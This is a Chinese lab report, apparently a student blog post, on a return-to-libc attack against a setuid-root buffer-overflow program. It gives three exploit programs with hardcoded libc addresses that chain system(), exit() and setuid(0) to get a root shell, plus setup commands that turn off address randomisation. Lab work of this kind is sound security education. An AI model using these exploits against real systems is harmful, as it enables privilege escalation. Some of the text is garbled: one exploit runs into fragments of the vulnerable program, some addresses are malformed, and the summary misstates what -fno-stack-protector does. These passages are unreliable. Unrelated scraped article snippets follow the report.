stonesharp
stonesharp

return-to-libc攻击实验

第一部分 实验背景

       缓冲区溢出的常用攻击方法是用shellcode的地址来覆盖漏洞程序的返回地址,使得漏洞程序去执行存放在栈中shellcode。于是为了阻止这种类型的攻击,一些操作系统(比如Fedora)使得系统管理员具有使栈不可执行的能力。这样的话,一旦程序执行存放在栈中的shellcode就会崩溃,从而阻止了攻击。

       不幸的是上面的保护方式并不是完全有效的,现在存在一种缓冲区溢出的变体攻击,叫做return-to-libc攻击。这种攻击不需要一个栈可以执行,甚至不需要一个shellcode。取而代之的是我们让漏洞程序调转到现存的代码(比如已经载入内存的libc库中的system()函数等)来实现我们的攻击。

第二部分 实验目的

       本次实验是为了探索return-to-libc攻击的机制,用它去攻击一个具有缓冲区漏洞的程序,从而获得root权限。

备注:Fedora系统默认具有栈不可执行的保护机制,我们实验用的Ubuntu系统默认没有这种机制。

第三部分 实验内容

漏洞程序:

// retlib.c               

// This program has a buffer overflow vulnerability.

// Our task is to exploit this vulnerability

#include

#include

#include

int bof(FILE *badfile)

{

       char buffer[12];            

//   The following statement has a buffer overflow problem    

       fread(buffer, sizeof(char), 40, badfile);

       return 1;

            

int main(int argc, char **argv)

{

       FILE *badfile;               

       badfile = fopen("badfile", "r");

       bof(badfile);           

       printf("Returned Properly\n");              

       fclose(badfile); return 1;

}

 

3.1 利用漏洞

分析:

下图是return-to-libc的调用栈格式如下:

<- stack grows this way

   addresses grow this way ->

------------------------------------------------------------------------------

| buffer fill-up | f1 | pop-ret | f1_arg | f2 | dmm | f2_arg1 | f2_arg2 ... 

------------------------------------------------------------------------------

                   ^

                   |

                   - this int32 should overwrite return address

                      of a vulnerable function

从图中我们可以看出,我们应该在bof的返回地址(即&buf[16])处放置system的入口地址,system的参数的地址放在与入口地址相隔四个字节的位置(即&buf[24]),中间的这四个字节应该放置exit函数的入口地址,这样这在system函数执行完毕之后,就会调用exit函数。

攻击程序:

//exploit_1.c

#include

#include

#include

int main(int argc, char **argv)

{

       char buf[40];

       FILE *badfile;

       badfile = fopen(".//badfile", "w");

       // You need to decide the addresses and

       the values for X, Y, Z. The order of the following

       three statements does not imply the order of X, Y, Z.

       Actually, we intentionally scrambled the order. *//

       strcpy(buf, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90");// nop 16 times

      

       *(long *) &buf[24] = 0xbffffe43 ; // "//bin//sh"

       *(long *) &buf[16] = 0xb7ea88b0 ; // system()

       *(long *) &buf[28] = 0xb7e9db30 ; // exit()

       fwrite(buf, sizeof(buf), 1, badfile);

       fclose(badfile);

}

攻击过程:

第一步 编译程序

sudo sysctl -w kernel.randomize_va_space=0

gcc -fno-stack-protector -o retlib retlib.c

sudo chown root:root retlib

sudo chmod 4755 retlib

return-to-libc攻击实验_第1张图片

 

第二步 system的放置在环境变量BIN_SH中,然后获取BIN的地址,同时用GDB获取systemexit的地址

return-to-libc攻击实验_第2张图片
return-to-libc攻击实验_第3张图片

第四步 攻击

return-to-libc攻击实验_第4张图片

备注

上面的实验实在/bin/sh指向zsh的情况下进行的,如果/bin/sh指向bash则上述的实验是获取不到root权限的,因为bash内置了权限降低的机制,虽然我们可以使得bof返回时执行system(“/bin/sh”);但是我们也获取不到root权限。

示意图如下:

return-to-libc攻击实验_第5张图片

 

3.2 /bin/sh指向bash时的攻击

分析:

/bin/sh指向bash的情况下,我们如果能在调用/bin/ bash之前提升正在运行的进程的Set-UIDroot权限,那么我们就可以绕过对bash的权限限制,幸运的是系统函数setuid(0)可以实现我们的目标,所以我们可以在调用系统函数system(“/bin/sh”)之前,先调用系统函数setuid(0)来提升权限。

 

我们攻击代码应该这样修改:

bof的返回地址处(&buf[16])写入setuid()的地址,setuid的参数0写在与其入口地址相隔一个字的位置(即buf[24])处(因为setuid()执行完毕之后,会转向存放setuid入口地址的下一个位置,所以这个位置应该放入system函数的入口地址),同理system的参数放入&buf[28]处。

攻击代码如下:

//exploit_2.c

#include

#include

#include

int main(int argc, char **argv)

{

char buf[40];

FILE *badfile;

badfile = fopen("./badfile", "w");

strcpy(buf, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90");// nop 16 times

 

*(long *) &buf[20] = 0xb7ea88b0 ; // system()

*(long *) &buf[28] = 0xbffffe43; // address of "/bin/sh"

*(long *) &buf[16] = 0xb 7f0f620 ; // setuid()

*(long *) &buf[24] = 0; // parameter for setuid

     

       fread(buffer, sizeof(char), 60, badfile);

       return 1;

            

int main(int argc, char **argv)

{

       FILE *badfile;      

       printf("\nsomeint = %x\n",&someint); 

       badfile = fopen("badfile", "r");

       bof(badfile);           

       printf("Returned Properly\n");              

       fclose(badfile); return 1;

  

3.3 在第二题的基础上,调用setuid0)之前嵌入调用system(“/usr/bin/id”)

为了能够调用system(“/usr/bin/id”),需要在漏洞程序中添加这么一条指令:

int someint=0xc 304c483; //add 4, $esp

(具体分析通上一题)   

攻击代码如下:

// exploit_3.c

#include

#include

#include

int main(int argc, char **argv)

{

char buf[60];

FILE *badfile;

badfile = fopen("./badfile", "w");

strcpy(buf, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90");// nop 16 times

*(long *) &buf[16] = 0xb7ea88b0;   // system()

*(long *) &buf[24] = 0xbffffe9f;    // address of "/usr/bin/id"

*(long *) &buf[20] = 0x0804a024;   // esp+4  buf+28

*(long *) &buf[32] = 0xb7ea88b0;   // system

*(long *) &buf[40] = 0xbffffe28;    // address of /bin/sh

*(long *) &buf[28] = 0xb7f0f620;   // setuid()

*(long *) &buf[36] = 0;           // parameter for setuid

fwrite(buf, sizeof(buf), 1, badfile);

fclose(badfile);

}

攻击示意图:

return-to-libc攻击实验_第6张图片

实验小结:

Ubuntu的地址随机化机制使得我们获取漏洞函数的返回地址和存放Shellcode地址困难许多,并且Ubuntu系统的缓冲区溢出保护机制(即-fno-stack-protector)对缓冲区的溢出进行保护,也使得这种攻击方法变得更加困难。

参考资料:

http://www.phrack.org/issues.html?issue=58&id=4#article

致谢:

3.3题中的0xc304c483; //add 4, $esp请教了Guo Linlin,I appreciate the help of her greatly!

 

附注:

//getenvaaddr.c
#include
#include
#include

int main(int argc, char *argv[])
{
       char *ptr;
       if(argc < 3)
       {
              printf("Usage:%s \n",argv[0]);
              exit(0);
       }
       ptr = getenv(argv[1]);  
       ptr += (strlen(argv[0]) - strlen(argv[2])) * 2;
//argv[0]:正在执行的程序名称,本程序中:getenvaaddr
//argv[1]:shellcode 变量名
//argv[2]:即将执行的漏洞程序的名称(包括路径),本程序中:./got_vul
//Linux ubuntu 系统中已经验证两者名称差一个字符,就会有两个字节的地址偏移
       printf("%s will be at %p\n", argv[1], ptr);
       return 0;

}

你可能感兴趣的:(杂类)

  • 软考——简单记忆设计模式 Yeira 设计模式pythonjava
    抽象工厂模式(AbstractFactory):提供一个接口,可以创建一系列相关或相互依赖的对象,而无需指定它们具体的类。(一个接口创建相关对象,无需具体的类)构建器模式(Builder):将一个复杂类的表示与其构造相分离,使得相同的构建过程能够得出不同的表示。(相同是构造,不同的表示)工厂方法模式(FactoryMethod):定义一个创建对象的接口,但由子类决定需要实例化哪一个类。工厂方法使得
  • 第五章 手写ref函数 DT—— 手写Vue3源码javascript前端html
    目录1.ref基本实现2.toRef基本实现3.toRefs基本实现4.proxyRefs基本实现1.ref基本实现ref函数接收一个一个值,如果这个值是基础数据类型,则直接返回一个RefImpl对象,并对这个对象设置属性访问器和属性修改器,在其中进行对应的依赖收集和触发更新如果接受一个复杂类型的数据,则会将数据包装成一个RefImpl对象,并将其value值通过reactive进行代理,最后设置
  • C#中List集合使用Remove方法详解——List使用Remove方法需要注意的坑? 猿享天开 学懂C#-高级编程技术精讲c#开发语言
    目录一、基本使用1、简单类型的例子2、复杂类型的例子二、思考三、深度解析四、正确的使用方式1、重写Equals和GetHashCode2、使用LINQ的FirstOrDefault方法五、性能考虑六、注意事项总结在C#中,List是一个常用的数据结构,它提供了一系列操作方法来管理其内部的元素。Remove方法是其中一个用于移除元素的重要方法。本文将深入探讨List.Remove方法的使用、底层原理
  • 第七章 手写watch 实现 DT—— 手写Vue3源码javascript前端vue.js
    1.创建watch函数在Vue3中,watch是一个函数,这个函数接收三个参数,前两个是必须的参数,第三个是一个配置参数。第一个参数是需要监听的响应式数据,对于复杂类型的数据可以直接传变量本身或者传入一个函数,该函数返回需要监听的数据,如果是简单类型数据,则必须传入一个函数然后函数返回该数据。第二个参数是一个回调函数,该回调函数会在监听数据发生变化后执行,同时该函数会被注入两个参数,第一个参数为变
  • SQLite3 数据类型深入全面讲解 软考鸭 nodejs帮助文档sqlitesqlite数据库
    SQLite3,作为一款轻量级的数据库管理系统,在数据存储方面展现出了其独特的魅力。它不仅支持标准的SQL语法,还提供了丰富的数据类型供开发者选择。这些数据类型不仅涵盖了基本的数值和文本类型,还包括了日期时间、二进制数据等复杂类型。本文将深入全面地讲解SQLite3的数据类型,帮助开发者更好地理解和应用这一强大的数据库工具。一、SQLite3数据类型概述SQLite3的数据类型系统相对简单,但又不
  • vue中ref和reactive Lancelot212 vue.js前端javascript
    ref和reactive是Vue3中用于创建响应式数据的两个重要API,它们之间存在几个关键的区别,主要体现在数据类型、使用方式、访问方式以及设计理念上。1.数据类型不同ref:主要用于定义简单类型的数据(如字符串、数字、布尔值等)以及单一的对象。虽然它可以用于对象,但通常用于需要保持对其值响应式引用的场景。reactive:则主要用于包装JavaScript对象和数组等复杂类型的数据。它能够递归
  • $router.back()携带参数,复杂类型参数和简单类型参数 进阶的巨人001 前端javascriptvue传参beforeRoute
    需求来源:跳转到另外一个页面的时候,$router.back()返回的时候想携带一些参数,然后在返回的页面进行一些操作,虽然可以用vuex或者localstorage这些存储,但始终感觉不太好解决办法:使用beforeRouteEnter进行组件传值上一个页面handleBack(){this.$route.params.id=1//保存的参数this.$router.back();},返回的页面
  • python 接口自动化数据结构(如列表、字典、元组) 测试界晓晓 软件测试python自动化数据结构软件测试自动化测试功能测试程序人生
    在Python接口自动化测试中,数据结构扮演着至关重要的角色,用于组织和处理测试数据、请求参数和响应结果。列表(List)列表是Python中的一种可变序列数据类型,它允许存储一系列有序的、可重复的元素,这些元素可以是任何数据类型,包括字符串、数字、布尔值甚至是其他的列表或字典等复杂类型。users_list=['user1','user2','user3']request_urls=['http
  • 【Rust】004-Rust 所有权 訾博ZiBo Rustrust开发语言后端
    【Rust】004-Rust所有权文章目录【Rust】004-Rust所有权一、预备知识1、堆和栈2、String类型&strString二、所有权规则1、所有权系统的三条规则2、代码示例3、所有权转移简单示例复杂类型的拷贝4、函数的传值与返回三、引用与借用1、借用2、不可变引用(只读)3、可变引用(可读可写)4、重要规则5、NLL6、悬垂引用错误代码四、切片1、概念2、字符串切片基本写法简化写法
  • SpringMVC 八重我老婆 javaspringmavenintellij-ideajvmmybatisjunit
    1.web层-代替Servlet(接收请求、处理请求、做出响应)2.作用做出响应页面跳转-返回字符串-默认转发forward:/xxx/xxxredirect:/xxx/xxx页面跳转-返回ModelAndView页面跳转-使用ServletAPI响应数据-设置响应正文response-流返回字符串+@ResponseBody响应数据-返回JSON返回方法必须是复杂类型@ResponseBody@
  • Spring-06-依赖注入(DI) CodeHuba
    依赖注入(DI)1构造器注入(前面已经说过了)2Set方式注入(重点)依赖注入:Set注入!依赖:bean对象的创建依赖于容器;注入:bean对象的所有属性,由容器来注入;环境搭建复杂类型publicclassAddress{privateStringaddress;publicStringgetAddress(){returnaddress;}publicvoidsetAddress(Strin
  • #Js篇:数组的方法es5和es6 前端xiaolibao Js篇javascript
    数组方法学习判断一个数组的方法Array.isArray()javascript内置的方法,用于检测给定的对象是否为数组类型。早期版本兼容性es5引入,对于不支持es5的老旧浏览器(如ie8及更早版本),该方法不可用。es5实例方法valueof()表示对对象求值。数组的valueOf方法返回数组本身toString()数组的toString方法返回数组的字符串形式----基本类型的数组复杂类型–
  • Watch 在 vue 3 中使用说明 刺客-Andy vue3vue.js前端javascriptvue
    一、监听基础类型constnums=ref(9)watch(nums,(newValue,oldValue)=>{console.log('watch已触发',newValue)})二、监听复杂类型constdemo=reactive({name:'前端小玖',nickName:'小玖',soulmate:{name:'',nickName:''}})复杂类型的监听有很多种情况,具体的内容如下监听
  • Java全栈课程之Spring详解——依赖注入 小孙同学1024 Java全栈开发springjava后端
    一、构造器注入二、set方式注入1.依赖注入:set注入2.依赖:bean对象的创建依赖于容器3.注入;bean对象中的所有属性,有容器来注入4.环境搭建①复杂类型publicclassAddress{privateStringaddress;publicStringgetAddress(){returnaddress;}publicvoidsetAddress(Stringaddress){th
  • C++构造函数/析构函数/复制构造函数(深拷贝/浅拷贝) 时吨吨 C++c++
    目录1.构造函数2.析构函数3.拷贝构造函数4.深拷贝和浅拷贝5.参考内容1.构造函数2.析构函数3.拷贝构造函数4.深拷贝和浅拷贝(1)当我们对复杂类型(结构体或者类)的对象进行初始化时,如果将对象A赋值给同类型的对象B,此时就涉及深拷贝和浅拷贝的问题;(2)如何定义拷贝的深和浅:浅拷贝就是把类/结构体的变量原封不动的赋值,不考虑指针变量;深拷贝就是在赋值时会对指针变量做处理;总结:对象拷贝时,
  • 字符串比较大小c语言指针详解经典非常详细,C语言指针详解(经典,非常详细) DreamBSD
    前言:复杂类型说明要了解指针,多多少少会出现一些比较复杂的类型,所以我先介绍一下如何完全理解一个复杂类型,要理解复杂类型其实很简单,一个类型里会出现很多运算符,他们也像普通的表达式一样,有优先级,其优先级和运算优先级一样,所以我总结了一下其原则:从变量名处起,根据运算符优先级结合,一步一步分析.下面让我们先从简单的类型开始慢慢分析吧:intp;//这是一个普通的整型变量int*p;//首先从P处开
  • 【Flink】FlinkSQL的DataGen连接器(测试利器) 一杯咖啡半杯糖 Flink实战flink大数据
    简介我们在实际开发过程中可以使用FlinkSQL的DataGen连接器实现FlinkSQL的批或者流模拟数据生成,DataGen连接器允许按数据生成规则进行读取,但注意:DataGen连接器不支持复杂类型:Array,Map,Row。请用计算列构造这些类型创建有界DataGen表CREATETABLEtest(aINT,bSTRING,createtimeTIMESTAMP(3),WATERMAR
  • 江醉心
    工作了,助理,帮别人忙人家的私人小时,打杂类~时间花费很多,赚钱的效率一般。自己确感觉没有了自己思想的时间,回来都是游戏度过~浪费时间。只有去保持健身房的频率,很少读书了,也很少听书了~进步的空间,想像的空间狭窄了。把游戏卸载了,看看我下班后自己的时间如何分配,想睡久点久点~终究还是不成熟,害怕的样子也许这是新的路子,也许这是新的开始,现在都不知道未来会成为什么样子。继续做吧,在没有自己坚定之前。
  • C语言基础07——结构体 蛋翼 C语言c语言开发语言
    目录结构体类型的声明与初始化结构体的声明结构体变量的定义和初始化结构体成员的访问结构体传参练习结构体类型的声明与初始化结构体的声明结构体使C语言有能力描述复杂类型。结构体是一种集合,它里面可以包含多个变量或数组,它们的类型可以相同,也可以不同,这些变量或数组都称为结构体的成员(Member)。结构体也是一种数据类型,它由程序员自己定义,可以包含多个其他类型的数据。像int、float、char等是
  • C语言指针你弄明白了吗 呼啦啦的爱
    C语言指针说难不难但是说容易又是最容易出错的地方,因此不管是你要做什么只要用到C指针你就跳不过,今天咱们就以十九个例子来给大家简单的分析一下指针的应用,最后会有C语言视频资料提供给大家更加深入的参考。进入今天的主题,要了解指针,多多少少会出现一些比较复杂的类型,所以我先介绍一下如何完全理解一个复杂类型,要理解复杂类型其实很简单,一个类型里会出现很多运算符,他们也像普通的表达式一样,有优先级,其优先
  • C# 浅克隆与深克隆 wangnaisheng C#c#
    在C#中,浅克隆(ShallowClone)和深克隆(DeepClone)是两种常见的对象克隆技术,用于创建对象的新副本。它们的主要区别在于复制对象的层次和属性的处理方式。浅克隆(ShallowCopy)当进行浅克隆时,一个新的对象实例被创建,原始对象的所有字段(成员变量)的值都被复制到新对象中。但是,如果这些字段包含引用类型(如类、数组或其他复杂类型),那么复制的是引用而不是引用的对象内容本身。
  • JavaScript对象----内置对象常用方法及案例 美貌与智慧并存的妞 JavaScript
    目录jQuery对象为什么要有对象什么是对象JavaScript中的对象对象字面量对象创建方式属性和方法new关键字this详解对象的使用遍历对象的属性删除对象的属性简单类型和复杂类型的区别内置对象MDN如何学习一个方法?Math对象Date对象Array对象基本包装类型String对象jQuery对象为什么要有对象functionprintPerson(name,age,sex....){}//
  • Spring Bean 依赖注入常见错误(下) xiaoshitou_2015 springjava后端
    在实际应用中,我们也会使用@Value等不太常见的注解来完成自动注入,同时也存在注入到集合、数组等复杂类型的场景。这些情况下,我们也会遇到一些问题。所以这一讲我们不妨来梳理下。案例1:@Value没有注入预期的值在装配对象成员属性时,我们常常会使用@Autowired来装配。但是,有时候我们也使用@Value进行装配。不过这两种注解使用风格不同,使用@Autowired一般都不会设置属性值,而@V
  • TS系列之typeof 菜鸡爱上编程 TS前端javascripttypescript
    TS系列之typeof这里写目录标题前言回顾:Js中typeof的用法1、typeof的返回类型有哪些Ts中的typeof运算符作为类型判断的工具什么是typeof?类型保护与条件类型复杂类型总结前言今天总结一下typeof相关的知识。typeof在Js中也是常用来判断变量类型的关键字,那么在Ts中的作用又是什么,下面一起来看看。回顾:Js中typeof的用法1、typeof的返回类型有哪些“un
  • mysql hive 数据类型_Hive数据类型 王火龙果 mysqlhive数据类型
    本章介绍Hive不同的数据类型,用于创建表。Hive所有数据类型分为四种类型,给出如下:列类型文字Null值复杂类型列类型列类型被用作Hive的列数据类型。它们如下:整型整型数据可以指定使用整型数据类型,INT。当数据范围超过INT的范围,需要使用BIGINT,如果数据范围比INT小,使用SMALLINT。TINYINT比SMALLINT小。下表描述了各种INT数据类型:类型后缀示例TINYINT
  • hive 数据类型 java_Hive - 数据类型 本本纲目 hive数据类型java
    本章将带您了解Hive中涉及表创建的不同数据类型。Hive中的所有数据类型分为四种类型,具体如下:列类型字面空值复杂类型列类型列类型用作Hive的列数据类型。他们如下:积分类型整型数据可以使用整型数据类型INT来指定。当数据范围超出INT范围时,需要使用BIGINT,如果数据范围小于INT,则使用SMALLINT。TINYINT比SMALLINT小。下表描述了各种INT数据类型:类型后缀例TINY
  • ༺༽༾ཊ—设计-原-06-型-模式—ཏ༿༼༻ __water 1024程序员节c#设计模式
    名称:原型模式类型:创建型目的:当有多个抽象角色时使用的一种工厂模式。抽象工厂模式可以向客户端提供一个接口,使客户端在不必指定产品的具体情况下,创建多个产品族中的产品对象,总体来说:对复杂创建类型进行自我复制,常与建造者模式结合使用优点:1.具体产品在应用层的代码隔离无需关系创建的细节2.将一个系列的产品统一到一起创建两种方式可以实现克隆,实现,解析:通过对(孙悟空类)复杂类的自我复制拓展功能解决
  • JavaScript隐式转换 LBJ辉 JavaScriptjavascript前端
    你所忽略的js隐式转换1、js数据类型js中有7种数据类型,可以分为两类:原始类型、对象类型:基础类型(原始值):undefined、null、String、Number、Boolean、Symbol(es6新出的,本文不讨论这种类型)复杂类型(对象值):object2、三种隐式转换类型js中一个难点就是js隐形转换,因为js在一些操作符下其类型会做一些变化,所以js灵活,同时造成易出错,并且难以
  • JS-数组相关 Turbosaa JavaScriptjavascript前端
    文章目录数组介绍创建数组数组特性数组塌陷数组介绍数组是js中的一种复杂类型数据array一组有序数据的列表私人解释:可以装载有序数据的“盒子”数组中可以存储多个任意类型的数据注意:一般一个数组中存储的数据类型都是一致的创建数组字面量创建语法:变量=[]得到一个空数组语法:变量=[数据,数据,数据...]得到一个有数据的数组数组中每个数据之间通过逗号分隔注意:逗号之间没有数据则会产生空数据empty
  • Vue3中的ref和shallowRef、reactive和shallowReactive 爱吃猪蹄_ vue.js前端javascript
    一:ref、reactive简介ref和reactive是Vue3中定义响应式数据的一种方式。ref通常用来定义基础类型数据。reactive通常用来定义复杂类型数据。二、shallowRef、shallowReactive简介shallowRef和shallowReactive是Vue3中定义浅层次响应式数据的方式三、Api使用对比注意:监听不到变化的数据,在页面中其它数据变化被监听到时,会同步
  • Spring中@Value注解,需要注意的地方 无量 springbean@Valuexml
    Spring 3以后,支持@Value注解的方式获取properties文件中的配置值,简化了读取配置文件的复杂操作 1、在applicationContext.xml文件(或引用文件中)中配置properties文件 <bean id="appProperty" class="org.springframework.beans.fac
  • mongoDB 分片 开窍的石头 mongodb
        mongoDB的分片。要mongos查询数据时候 先查询configsvr看数据在那台shard上,configsvr上边放的是metar信息,指的是那条数据在那个片上。由此可以看出mongo在做分片的时候咱们至少要有一个configsvr,和两个以上的shard(片)信息。     第一步启动两台以上的mongo服务 &nb
  • OVER(PARTITION BY)函数用法 0624chenhong oracle
    这篇写得很好,引自 http://www.cnblogs.com/lanzi/archive/2010/10/26/1861338.html OVER(PARTITION BY)函数用法 2010年10月26日 OVER(PARTITION BY)函数介绍 开窗函数        &nb
  • Android开发中,ADB server didn't ACK 解决方法 一炮送你回车库 Android开发
    首先通知:凡是安装360、豌豆荚、腾讯管家的全部卸载,然后再尝试。   一直没搞明白这个问题咋出现的,但今天看到一个方法,搞定了!原来是豌豆荚占用了 5037 端口导致。 参见原文章:一个豌豆荚引发的血案——关于ADB server didn't ACK的问题 简单来讲,首先将Windows任务进程中的豌豆荚干掉,如果还是不行,再继续按下列步骤排查。 &nb
  • canvas中的像素绘制问题 换个号韩国红果果 JavaScriptcanvas
    pixl的绘制,1.如果绘制点正处于相邻像素交叉线,绘制x像素的线宽,则从交叉线分别向前向后绘制x/2个像素,如果x/2是整数,则刚好填满x个像素,如果是小数,则先把整数格填满,再去绘制剩下的小数部分,绘制时,是将小数部分的颜色用来除以一个像素的宽度,颜色会变淡。所以要用整数坐标来画的话(即绘制点正处于相邻像素交叉线时),线宽必须是2的整数倍。否则会出现不饱满的像素。 2.如果绘制点为一个像素的
  • 编码乱码问题 灵静志远 javajvmjsp编码
    1、JVM中单个字符占用的字节长度跟编码方式有关,而默认编码方式又跟平台是一一对应的或说平台决定了默认字符编码方式;2、对于单个字符:ISO-8859-1单字节编码,GBK双字节编码,UTF-8三字节编码;因此中文平台(中文平台默认字符集编码GBK)下一个中文字符占2个字节,而英文平台(英文平台默认字符集编码Cp1252(类似于ISO-8859-1))。 3、getBytes()、getByte
  • java 求几个月后的日期 darkranger calendargetinstance
    Date plandate = planDate.toDate(); SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd"); Calendar cal = Calendar.getInstance(); cal.setTime(plandate); // 取得三个月后时间 cal.add(Calendar.M
  • 数据库设计的三大范式(通俗易懂) aijuans 数据库复习
    关系数据库中的关系必须满足一定的要求。满足不同程度要求的为不同范式。数据库的设计范式是数据库设计所需要满足的规范。只有理解数据库的设计范式,才能设计出高效率、优雅的数据库,否则可能会设计出错误的数据库. 目前,主要有六种范式:第一范式、第二范式、第三范式、BC范式、第四范式和第五范式。满足最低要求的叫第一范式,简称1NF。在第一范式基础上进一步满足一些要求的为第二范式,简称2NF。其余依此类推。
  • 想学工作流怎么入手 atongyeye jbpm
    工作流在工作中变得越来越重要,很多朋友想学工作流却不知如何入手。 很多朋友习惯性的这看一点,那了解一点,既不系统,也容易半途而废。好比学武功,最好的办法是有一本武功秘籍。研究明白,则犹如打通任督二脉。 系统学习工作流,很重要的一本书《JBPM工作流开发指南》。 本人苦苦学习两个月,基本上可以解决大部分流程问题。整理一下学习思路,有兴趣的朋友可以参考下。 1  首先要
  • Context和SQLiteOpenHelper创建数据库 百合不是茶 androidContext创建数据库
           一直以为安卓数据库的创建就是使用SQLiteOpenHelper创建,但是最近在android的一本书上看到了Context也可以创建数据库,下面我们一起分析这两种方式创建数据库的方式和区别,重点在SQLiteOpenHelper     一:SQLiteOpenHelper创建数据库:   1,SQLi
  • 浅谈group by和distinct bijian1013 oracle数据库group bydistinct
            group by和distinct只了去重意义一样,但是group by应用范围更广泛些,如分组汇总或者从聚合函数里筛选数据等。         譬如:统计每id数并且只显示数大于3 select id ,count(id) from ta
  • vi opertion 征客丶 macoprationvi
    进入 command mode (命令行模式) 按 esc 键 再按 shift + 冒号 注:以下命令中 带 $ 【在命令行模式下进行】,不带 $ 【在非命令行模式下进行】 一、文件操作 1.1、强制退出不保存 $ q! 1.2、保存 $ w 1.3、保存并退出 $ wq 1.4、刷新或重新加载已打开的文件 $ e 二、光标移动 2.1、跳到指定行 数字
  • 【Spark十四】深入Spark RDD第三部分RDD基本API bit1129 spark
      对于K/V类型的RDD,如下操作是什么含义?   val rdd = sc.parallelize(List(("A",3),("C",6),("A",1),("B",5)) rdd.reduceByKey(_+_).collect  reduceByKey在这里的操作,是把
  • java类加载机制 BlueSkator java虚拟机
    java类加载机制 1.java类加载器的树状结构 引导类加载器 ^ | 扩展类加载器 ^ | 系统类加载器 java使用代理模式来完成类加载,java的类加载器也有类似于继承的关系,引导类是最顶层的加载器,它是所有类的根加载器,它负责加载java核心库。当一个类加载器接到装载类到虚拟机的请求时,通常会代理给父类加载器,若已经是根加载器了,就自己完成加载。 虚拟机区分一个Cla
  • 动态添加文本框 BreakingBad 文本框
      <script>     var num=1; function AddInput() {      var str="";     str+="<input 
  • 读《研磨设计模式》-代码笔记-单例模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ public class Singleton { } /* * 懒汉模式。注意,getInstance如果在多线程环境中调用,需要加上synchronized,否则存在线程不安全问题 */ class LazySingleton
  • iOS应用打包发布常见问题 chenhbc iosiOS发布iOS上传iOS打包
    这个月公司安排我一个人做iOS客户端开发,由于急着用,我先发布一个版本,由于第一次发布iOS应用,期间出了不少问题,记录于此。   1、使用Application Loader 发布时报错:Communication error.please use diagnostic mode to check connectivity.you need to have outbound acc
  • 工作流复杂拓扑结构处理新思路 comsci 设计模式工作算法企业应用OO
    我们走的设计路线和国外的产品不太一样,不一样在哪里呢?  国外的流程的设计思路是通过事先定义一整套规则(类似XPDL)来约束和控制流程图的复杂度(我对国外的产品了解不够多,仅仅是在有限的了解程度上面提出这样的看法),从而避免在流程引擎中处理这些复杂的图的问题,而我们却没有通过事先定义这样的复杂的规则来约束和降低用户自定义流程图的灵活性,这样一来,在引擎和流程流转控制这一个层面就会遇到很
  • oracle 11g新特性Flashback data archive daizj oracle
    1. 什么是flashback data archive Flashback data archive是oracle 11g中引入的一个新特性。Flashback archive是一个新的数据库对象,用于存储一个或多表的历史数据。Flashback archive是一个逻辑对象,概念上类似于表空间。实际上flashback archive可以看作是存储一个或多个表的所有事务变化的逻辑空间。
  • 多叉树:2-3-4树 dieslrae
        平衡树多叉树,每个节点最多有4个子节点和3个数据项,2,3,4的含义是指一个节点可能含有的子节点的个数,效率比红黑树稍差.一般不允许出现重复关键字值.2-3-4树有以下特征:     1、有一个数据项的节点总是有2个子节点(称为2-节点)     2、有两个数据项的节点总是有3个子节点(称为3-节
  • C语言学习七动态分配 malloc的使用 dcj3sjt126com clanguagemalloc
    /* 2013年3月15日15:16:24 malloc 就memory(内存) allocate(分配)的缩写 本程序没有实际含义,只是理解使用 */ # include <stdio.h> # include <malloc.h> int main(void) { int i = 5; //分配了4个字节 静态分配 int * p
  • Objective-C编码规范[译] dcj3sjt126com 代码规范
      原文链接 : The official raywenderlich.com Objective-C style guide 原文作者 : raywenderlich.com Team 译文出自 : raywenderlich.com Objective-C编码规范 译者 : Sam Lau
  • 0.性能优化-目录 frank1234 性能优化
    从今天开始笔者陆续发表一些性能测试相关的文章,主要是对自己前段时间学习的总结,由于水平有限,性能测试领域很深,本人理解的也比较浅,欢迎各位大咖批评指正。 主要内容包括: 一、性能测试指标 吞吐量、TPS、响应时间、负载、可扩展性、PV、思考时间 http://frank1234.iteye.com/blog/2180305 二、性能测试策略 生产环境相同 基准测试 预热等 htt
  • Java父类取得子类传递的泛型参数Class类型 happyqing java泛型父类子类Class
      import java.lang.reflect.ParameterizedType; import java.lang.reflect.Type; import org.junit.Test; abstract class BaseDao<T> { public void getType() { //Class<E> clazz =
  • 跟我学SpringMVC目录汇总贴、PDF下载、源码下载 jinnianshilongnian springMVC
      ----广告-------------------------------------------------------------- 网站核心商详页开发 掌握Java技术,掌握并发/异步工具使用,熟悉spring、ibatis框架; 掌握数据库技术,表设计和索引优化,分库分表/读写分离; 了解缓存技术,熟练使用如Redis/Memcached等主流技术; 了解Ngin
  • the HTTP rewrite module requires the PCRE library 流浪鱼 rewrite
    ./configure: error: the HTTP rewrite module requires the PCRE library. 模块依赖性Nginx需要依赖下面3个包 1. gzip 模块需要 zlib 库 ( 下载: http://www.zlib.net/ ) 2. rewrite 模块需要 pcre 库 ( 下载: http://www.pcre.org/ ) 3. s
  • 第12章 Ajax(中) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • Optimize query with Query Stripping in Web Intelligence blueoxygen BO
    http://wiki.sdn.sap.com/wiki/display/BOBJ/Optimize+query+with+Query+Stripping+in+Web+Intelligence and a very straightfoward video http://www.sdn.sap.com/irj/scn/events?rid=/library/uuid/40ec3a0c-936
  • Java开发者写SQL时常犯的10个错误 tomcat_oracle javasql
    1、不用PreparedStatements   有意思的是,在JDBC出现了许多年后的今天,这个错误依然出现在博客、论坛和邮件列表中,即便要记住和理解它是一件很简单的事。开发者不使用PreparedStatements的原因可能有如下几个:   他们对PreparedStatements不了解   他们认为使用PreparedStatements太慢了   他们认为写Prepar
  • 世纪互联与结盟有感 阿尔萨斯
